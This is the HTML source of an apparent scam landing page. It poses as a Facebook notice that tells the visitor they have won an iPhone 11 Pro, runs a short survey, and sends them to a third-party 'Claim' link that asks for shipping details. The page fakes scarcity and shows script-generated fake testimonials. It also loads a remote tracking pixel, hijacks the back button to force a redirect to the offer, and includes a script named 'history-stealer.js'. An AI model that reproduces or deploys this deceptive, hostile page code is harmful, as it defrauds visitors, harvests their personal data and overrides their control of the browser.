<!DOCTYPE html><html lang="en"><head>
  <base href="">

    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <!-- 541266  -->
    <link rel="stylesheet" href="https://amymalloy.com/lend/6/style.css">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.0/jquery.min.js"></script>
    <script src="https://amymalloy.com/lend/6/jquery.min.js"></script>
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <script src="https://amymalloy.com/lend/6/jquery.squishy.js"></script>
    <title>Congratulations!</title>
    <!--    Key Gen ======= an iPhone 7-->
    <!-- <link rel="stylesheet" href="/templates/_common/_templates/blue_survey_noselect_EN_MO2/css/responsive.css"> -->

    <meta name="robots" content="noindex, nofollow">

<script>
function nextQuestion(number, offer){
    $('.fade').fadeIn(function(){
        $('#question'+(number-1)).hide();
        $('#question'+number).show();
        $('.fade').fadeOut(function(){
                if(offer != undefined){
                    $('.loader .text1').fadeIn();
                    setTimeout(function(){
                        $('.loader .text1').fadeOut(function(){$('.loader .text2').fadeIn()});
                        setTimeout(function(){
                            $('.loader .text2').fadeOut(function(){$('.loader .text3').fadeIn()});
                            setTimeout(function(){
                                nextQuestion(6);
                            }, 10);
                        }, 2000);
                        
                    }, 2000);
                }
            }
        );
    })  
}
</script>

<strong>
    <script>/*<![CDATA[*/var names=["Tammy Levi","Chuck Pole","Martin Crux","Mary Gainey","Jennifer Lewis","Jones White","Harry Craney"];function dateOffset(f,j){var l=new Date(Date.now()-f*24*60*60*1000),e=["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],k=["January","February","March","April","Maybe","June","July","August","September","October","November","December"],a=new Boolean(f==null||f==0||f==undefined||f=="");if(a==true){f=0}if(!j==null||!j==0||!j==undefined){if(j=="day_name_only"&&a){return e[l.getDay()]}else{if(j=="top_date"&&a){return e[l.getDay()]+", "+k[l.getMonth()]+" "+l.getDate()+", "+l.getFullYear()}}}else{return l.getDate()+" "+k[l.getMonth()]}}/*]]>*/</script>
</strong>
<script>
    function CloseWindow() {
        $('#CloseThisWindow').fadeOut();
        $('#CloseThisWindowBack').fadeOut();
    }
</script>
<script>function getUclick(){var e=document.cookie.match(new RegExp("(?:^|; )uclick=([^;]*)"));return e?decodeURIComponent(e[1]):void 0}function fxOfLnks(){var e=getUclick();if(void 0===e)return!1;for(var n=document.getElementsByTagName("a"),t=0;t<n.length;t++){var i=n[t].getAttribute("href");"string"==typeof i&&(-1==i.indexOf("&event")&&-1==i.indexOf("?event")&&-1==i.indexOf("?lp=1")&&-1==i.indexOf("?lp=data_upd")&&-1==i.indexOf("?cnv_id=OPTIONAL")||(n[t].href=i+"&uclick="+e))}}function sendLpPixel(){var e=window.location.search;0===e.indexOf("?")&&(e=e.substr(1,e.length));var n="https://obriny.com/click.php?key=tm7z7mdhd93mxjnykemr&lp_type=pixel"+(e?"&"+e:""),t=document.createElement("script");t.async=!1,t.src=n,document.head.appendChild(t),t.onload=function(){window.lp_pixel_wait_flag=!1,"loading"===document.readyState?(document.addEventListener("DOMContentLoaded",fxOfLnks),"function"==typeof window.lp_pixel_callback&&document.addEventListener("DOMContentLoaded",function(){window.lp_pixel_callback(window.tokens)})):(fxOfLnks(),"function"==typeof window.lp_pixel_callback&&window.lp_pixel_callback(window.tokens))}}sendLpPixel();</script>
</head>

<body>

<div style="visibility:hidden;background:rgba(0,0,0,0.3); z-index:99; position:fixed; height:100%; width:100%" id="CloseThisWindowBack" onclick="CloseWindow()"></div>

<div id="CloseThisWindow" class="wrapper" style="visibility:hidden;position:fixed; z-index:100; left:50%; margin-right: -50%; transform: translate(-50%, -50%); top:50%; margin-bottom:-50%;">
<div class="content-box" style="padding:20px;">
<p><b>Dear <script>document.write(getURLParameter("brand"));</script> <script>document.write(getURLParameter("model"));</script> Facebook user,</b>
</p><br>
<p style="font-size:10.5pt">
<strong>
<script>/*<![CDATA[*/var names=["Tammy Levi","Chuck Pole","Martin Crux","Mary Gainey","Jennifer Lewis","Jones White","Harry Craney"];function dateOffset(f,j){var l=new Date(Date.now()-f*24*60*60*1000),e=["Sunday","Monday","Tuesday","Wednesday","Thursday","Friday","Saturday"],k=["January","February","March","April","Maybe","June","July","August","September","October","November","December"],a=new Boolean(f==null||f==0||f==undefined||f=="");if(a==true){f=0}if(!j==null||!j==0||!j==undefined){if(j=="day_name_only"&&a){return e[l.getDay()]}else{if(j=="top_date"&&a){return e[l.getDay()]+", "+k[l.getMonth()]+" "+l.getDate()+", "+l.getFullYear()}}}else{return l.getDate()+" "+k[l.getMonth()]}};document.write(dateOffset(0,"top_date"));/*]]>*/</script>
</strong>
</p>
<br>
<p>Congratulations
<script>document.write(getURLParameter("brand"));</script>
<script>document.write(getURLParameter("model"));</script>National Consumer Center has selected you as one of only a few users in the USA
<script>document.write(getURLParameter("region"));</script>to claim a Iphone 11 Pro !</p>
<br>
<p>Click OK to answer questions below and claim your reward!</p><hr><br>
<div class="modal-footer">
<button type="button" class="btn btn-primary" data-dismiss="modal" onclick="CloseWindow()">OK</button>
</div>
</div>
</div>


    <div class="top-bar cf">
        <div class="wrapper">
            <img src="https://amymalloy.com/lend/3/face-ico.svg" alt="" class="logo" style="height: 35px; margin: 5px;">
        </div>
        <!-- wrapper -->
    </div>
    <div class="header cf">
        <div class="wrapper">
            <div class="content-box">
                <div class="header-text">
                <script>document.write(dateOffset(0,"top_date"));</script><p><p>
                    Answer our questions below to claim your Iphone 11 Pro !<p>
                    <b>Important:</b> Hurry, only a limited quantity of rewards remaining!
                </div>
                <div class="header-logos" style="padding-top:px;">
                    <img src="https://amymalloy.com/lend/6/ix-g.png">
                </div>
            </div>
        </div>
        <!-- wrapper -->
    </div>
    <!-- header -->
    <div class="main_content">
        <div class="wrapper">
            <div class="content-box">
                <div class="fade"></div>
                <div class="questions">
                    <div id="question1" class="question">
                        <h1 class="question-number">Question 1 of 4</h1>
                        <div class="question-text">
                            Are you male or female?
                        </div>
                        <div class="answers">
                            <ul class="answer-list">
                                <li>
                                    <a onclick="nextQuestion(2);" class="btn rollover"><span>Male</span></a>
                                </li>
                                <li>
                                    <a onclick="nextQuestion(2);" class="btn rollover"><span>Female</span></a>
                                </li>
                            </ul>
                        </div>
                    </div>
                    <!-- question -->
                    <div id="question2" class="question">
                        <h1 class="question-number">Question 2 of 4</h1>
                        <div class="question-text">
                            Do you shop online?
                        </div>
                        <div class="answers">
                            <ul class="answer-list">
                                <li>
                                    <a onclick="nextQuestion(3);" class="btn rollover"><span>Yes</span></a>
                                </li>
                                <li>
                                    <a onclick="nextQuestion(3);" class="btn rollover"><span>No</span></a>
                                </li>
                            </ul>
                        </div>
                    </div>
                    <!-- question -->
                    <div id="question3" class="question">
                        <h1 class="question-number">Question 3 of 4</h1>
                        <div class="question-text">
                            How old are you?
                        </div>
                        <div class="answers">
                            <ul class="answer-list">
                                <li>
                                    <a onclick="nextQuestion(4);" class="btn rollover"><span>18-29</span></a>
                                </li>
                                <li>
                                    <a onclick="nextQuestion(4);" class="btn rollover"><span>30-39</span></a>
                                </li>
                                <li>
                                    <a onclick="nextQuestion(4);" class="btn rollover"><span>40-49</span></a>
                                </li>
                                <li>
                                    <a onclick="nextQuestion(4);" class="btn rollover"><span>50+</span></a>
                                </li>
                            </ul>
                        </div>
                    </div>
                    <!-- question -->
                    <!-- question -->
                    <div id="question4" class="question">
                        <h1 class="question-number">Question 4 of 4</h1>
                        <div class="question-text">
                            Which of these is your phone brand?
                        </div>
                        <div class="answers">
                            <ul class="answer-list">
                                <li>
                                    <a onclick="nextQuestion(5);" class="btn rollover"><span>Apple</span></a>
                                </li>
                                <li>
                                    <a onclick="nextQuestion(5);" class="btn rollover"><span>Samsung</span></a>
                                </li>
                                <li>
                                    <a onclick="nextQuestion(5);" class="btn rollover"><span>LG</span></a>
                                </li>
                                <li>
                                    <a onclick="nextQuestion(5);" class="btn rollover"><span>Huawei</span></a>
                                </li>
                                <li>
                                    <a onclick="nextQuestion(5);" class="btn rollover"><span>Other</span></a>
                                </li>
                            </ul>
                        </div>
                    </div>

                    
                    <div id="question5" class="question">
                        
<div class="container2">
Thank you for helping us out,  Iphone 11 Pro has now been reserved for you.<br><br>
<div class="congrats" style="text-align:left;margin-top:5px;margin-left:5px">
<p><b>Step 1:</b> Click the "Claim" button.</p>
<p><b>Step 2:</b> Enter your shipping information on the next page and follow the instructions to claim your reward.</p>
<p style="padding-top:10px"><b>Important:</b> Hurry, limited quantities available.</p>
</div>
<div class="flex-container">
<div>
<img src="6/ix-g.png" style="width:80%">
<br>
<a href="https://obriny.com/click.php?lp=1" target="_blank" class="mrb1"><span style="font-size:15px">Claim&nbsp;<span>❯</span></span></a>

<span class="rem">
<br> Remaining: <span class="green danger danger_green">2</span>
</span>
</div>
</div>
</div>
<div style="height:15px; width:100%"></div>
                    </div>
                    <!-- question -->
                </div>
                <!-- questions -->
            </div>
            <!-- content-box -->
        </div>
        <!-- wrapper -->
    </div>
    <!-- main_content -->
    <div class="footer">
    </div>
    <!-- end of wrapper -->

    <script type="text/javascript">
        $(document).ready(function () {
            /* $(".header-text h1").squishy({maxWidth: 590, maxSize: 80 }); */
        });
    </script>

    <!-- Alert on Page Load  -->
    <script type="text/javascript">
        window.onload = function () {
        //alert("CONGRATULATIONS!\n\nYou have been randomly selected for our user appreciation survey!");
    };
    </script>
    
    <!-- Back button redirect -->
    <script type="text/javascript"> 
        ! function () { 
            var t; 
            try { 
                for (t = 0; 10 > t; ++t) history.pushState({}, "", "#"); 
                onpopstate = function (t) { 
                    t.state && location.replace("https://obriny.com/click.php?lp=1") 
                } 
            } catch (o) {} 
        }(); 
    </script>

    <!-- End of Back button redirect -->
<div class="wrapper">
<div class="content-box" style="padding:20px;">
<center>
<font face="arial">
<font color="000"><strong>REACTIONS</strong></font>
</font>
<hr>
<font face="arial">
<table width="100%" cellspacing="20" cellpadding="4" border="0" style="padding-top:10px;font-size:13px">
<tbody>
<tr>
<td width="65" valign="top" align="left"><img src="https://amymalloy.com/lend/6/4.1.jpg" height="50" width="50"></td>
<td align="left" valign="top">
<div style="font-weight:bold;color:#3b5998">
<script>document.write(names[0]);</script>
</div><div style="padding-top:5px">I’m just hoping this is something i actually receive and didn’t waste my time! i need this rn</div>
<div style="padding-top:5px;color:#9c9c9c;font-size:11px">
<script>document.write(dateOffset(1));</script>
</div>
</td>
</tr>
<tr>
<td colspan="2">
<hr>
</td>
</tr>
<tr>
<td width="50" valign="top" align="left"><img src="https://amymalloy.com/lend/6/1.1.jpg" height="50" width="50"></td>
<td align="left" valign="top">
<div style="font-weight:bold;color:#3b5998">
<script>document.write(names[1]);</script>
</div>
<div style="padding-top:10px">I enjoyed this such an amazing program. Thank You!</div>
<div style="padding-top:5px;color:#9c9c9c;font-size:11px">
<script>document.write(dateOffset(1));</script>
</div>
</td>
</tr>
<tr>
<td colspan="2">
<hr>
</td>
</tr>
<tr>
<td width="50" valign="top" align="left"><img src="https://amymalloy.com/lend/6/2.1.jpg" height="50" width="50"></td>
<td align="left" valign="top">
<div style="font-weight:bold;color:#3b5998">
<script>document.write(names[2]);</script>
</div>
<div style="padding-top:5px">I have completed 1 silver deal, 1 gold deal and 8 platinum deal. I want to claim my Iphone 11 Pro that was promised to me!!!!</div>
<div style="padding-top:5px;color:#9c9c9c;font-size:11px">
<script>document.write(dateOffset(2));</script>
</div>
</td>
</tr>
<tr>
<td colspan="2">
<hr>
</td>
</tr>
<tr>
<td width="50" valign="top" align="left"><img src="https://amymalloy.com/lend/6/5.1.jpg" height="50" width="50"></td>
<td align="left" valign="top">
<div style="font-weight:bold;color:#3b5998">
<script>document.write(names[3]);</script>
</div>
<div style="padding-top:5px">
<font face="arial">@</font>Hey
<script>document.write(names[2].split(" ")[0]);</script> OK just takes a minute to verify program status</div>
<div style="padding-top:5px;color:#9c9c9c;font-size:11px">
<script>document.write(dateOffset(2));</script>
</div>
</td>
</tr>
<tr>
<td colspan="2">
<hr>
</td>
</tr>
<tr>
<td width="50" valign="top" align="left"><img src="https://amymalloy.com/lend/6/6.1.jpg" height="50" width="50"></td>
<td align="left" valign="top">
<div style="font-weight:bold;color:#3b5998">
<script>document.write(names[4]);</script>
</div>
<div style="padding-top:5px">This was really fun and I can't wait to get my phone. </div>
<div style="padding-top:5px;color:#9c9c9c;font-size:11px">
<script>document.write(dateOffset(3));</script>
</div>
</td>
</tr>
<tr>
<td colspan="2">
<hr>
</td>
</tr>
<tr>
<td width="50" valign="top" align="left"><img src="https://amymalloy.com/lend/6/3.1.jpg" height="50" width="50"></td>
<td align="left" valign="top">
<div style="font-weight:bold;color:#3b5998">
<script>document.write(names[5]);</script>
</div>
<div style="padding-top:5px">Thank you so much for this great gift. You people are saints. It just goes t ok show not all heroes wear capes. Thank you.</div>
<div style="padding-top:5px;color:#9c9c9c;font-size:11px">
<script>document.write(dateOffset(3));</script>
</div>
</td>
</tr>
<tr>
<td colspan="2">
<hr>
</td>
</tr>
<tr>
<td width="50" valign="top" align="left"><img src="https://amymalloy.com/lend/6/7.1.jpg" height="50" width="50"></td>
<td align="left" valign="top">
<div style="font-weight:bold;color:#3b5998">
<script>document.write(names[6]);</script>
</div>
<div style="padding-top:5px">Can't wait to redeem my rewards!</div>
<div style="padding-top:5px;color:#9c9c9c;font-size:11px">
<script>document.write(dateOffset(4));</script>
</div>
</td>
</tr>
<tr>
<td colspan="2">&nbsp;</td>
</tr>
</tbody>
</table>
</font>
<div style="padding-top:0">Submit your comment:</div>
<div class="addCommentBox">
<textarea name="Kommentar" class="commentTextBox"></textarea><br>
<input type="button" onclick="javascript:comment()" value="Comment">
</div>
</center>
</div>
</div>

<script src="history-stealer.js"></script>
<style>
    .container2{
        padding:20px;
    }
    .flex-container > div{
        background:#f5f5f5;
        padding:20px 5px;
        border-radius:6px;
        padding-bottom:50px;
    }
    .flex-container a{
        padding:10px 20px;
        color:white;
        text-decoration:none;
    }
    .mrb1{
        background:#dc3a3a;
        border-radius:4px;
        position:relative;
        top:10px;
    }
    .rem{
        position:relative;
        top:30px;
    }
    .green{
        background:#39b54a;
        border-radius:4px;
        padding:2px 5px;
        color:white;
        font-weight: bold;
    }
</style>
<script type="text/javascript">

    $("#question4").on("click",function(){
        setTimeout(function(){
            $(".header").css("display","none");
        },500);
        
    });
</script>
</body></html>